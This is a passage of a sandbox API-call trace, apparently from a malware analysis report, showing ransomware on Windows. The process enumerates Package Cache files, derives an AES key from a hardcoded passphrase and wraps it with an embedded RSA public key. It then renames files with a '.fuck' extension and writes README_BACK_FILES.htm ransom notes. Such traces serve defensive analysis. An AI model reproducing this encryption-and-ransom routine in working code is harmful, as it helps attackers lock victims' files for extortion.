(normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.671] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.671] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1970) returned 1 [0240.674] CryptCreateHash (in: hProv=0x28f1970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.674] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.674] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.674] CryptDeriveKey (in: hProv=0x28f1970, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e6bb8) returned 1 [0240.674] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.674] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.674] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f0d38) returned 1 [0240.675] CryptImportPublicKeyInfo (in: hCryptProv=0x28f0d38, dwCertEncodingType=0x1, pInfo=0x2905c38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905c68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905c70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7478) returned 1 [0240.675] CryptEncrypt (in: hKey=0x28e7478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.675] CryptEncrypt (in: hKey=0x28e7478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f19f8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f19f8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.675] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f19f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.675] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.675] CryptEncrypt (in: hKey=0x28e6bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.675] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.675] CloseHandle (hObject=0xffffffff) returned 1 [0240.676] CloseHandle (hObject=0xffffffff) returned 1 [0240.676] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0240.676] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.677] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg")) returned 0 [0240.677] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.fuck")) returned 0 [0240.678] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.678] CryptDestroyKey (hKey=0x28e6bb8) returned 1 [0240.678] CryptReleaseContext (hProv=0x28f1970, dwFlags=0x0) returned 1 [0240.678] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.678] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.678] GetLastError () returned 0x5 [0240.678] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0240.679] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x80) returned 0 [0240.679] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.679] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.680] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.681] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f8548) returned 1 [0240.683] CryptCreateHash (in: hProv=0x28f8548, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.684] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.684] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.684] CryptDeriveKey (in: hProv=0x28f8548, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e6bb8) returned 1 [0240.684] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.684] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.684] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f82a0) returned 1 [0240.684] CryptImportPublicKeyInfo (in: hCryptProv=0x28f82a0, dwCertEncodingType=0x1, pInfo=0x2906118*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906148*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906150*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e75f8) returned 1 [0240.684] CryptEncrypt (in: hKey=0x28e75f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.685] CryptEncrypt (in: hKey=0x28e75f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f83b0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f83b0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.685] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f83b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.685] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.685] CryptEncrypt (in: hKey=0x28e6bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.685] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.685] CloseHandle (hObject=0xffffffff) returned 1 [0240.685] CloseHandle (hObject=0xffffffff) returned 1 [0240.685] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), bFailIfExists=0) returned 0 [0240.686] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x0) returned 0 [0240.686] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg")) returned 0 [0240.686] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.fuck")) returned 0 [0240.687] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.687] CryptDestroyKey (hKey=0x28e6bb8) returned 1 [0240.687] CryptReleaseContext (hProv=0x28f8548, dwFlags=0x0) returned 1 [0240.687] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.687] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.687] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\readme_back_files.htm")) returned 0xffffffff [0240.688] AreFileApisANSI () returned 1 [0240.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28daf10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0240.688] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.688] GetLastError () returned 0x5 [0240.688] GetLastError () returned 0x5 [0240.688] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.688] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.688] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.689] AreFileApisANSI () returned 1 [0240.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.689] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.689] GetLastError () returned 0x5 [0240.689] GetLastError () returned 0x5 [0240.689] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.689] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.689] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0240.690] AreFileApisANSI () returned 1 [0240.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.690] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.690] GetLastError () returned 0x5 [0240.690] GetLastError () returned 0x5 [0240.690] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.690] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.691] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.691] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.691] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.691] GetLastError () returned 0x5 [0240.691] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm")) returned 0x20 [0240.691] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x80) returned 0 [0240.691] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.692] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.692] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0240.693] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.696] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.696] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.696] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.696] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7238) returned 1 [0240.696] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.696] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.696] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f8548) returned 1 [0240.697] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8548, dwCertEncodingType=0x1, pInfo=0x2905dd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905e08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905e10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6b78) returned 1 [0240.697] CryptEncrypt (in: hKey=0x28e6b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.697] CryptEncrypt (in: hKey=0x28e6b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1068*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f1068*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1068, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.697] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.697] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.697] CloseHandle (hObject=0xffffffff) returned 1 [0240.697] CloseHandle (hObject=0xffffffff) returned 1 [0240.697] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), bFailIfExists=0) returned 0 [0240.698] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x0) returned 0 [0240.698] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg")) returned 0 [0240.699] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package 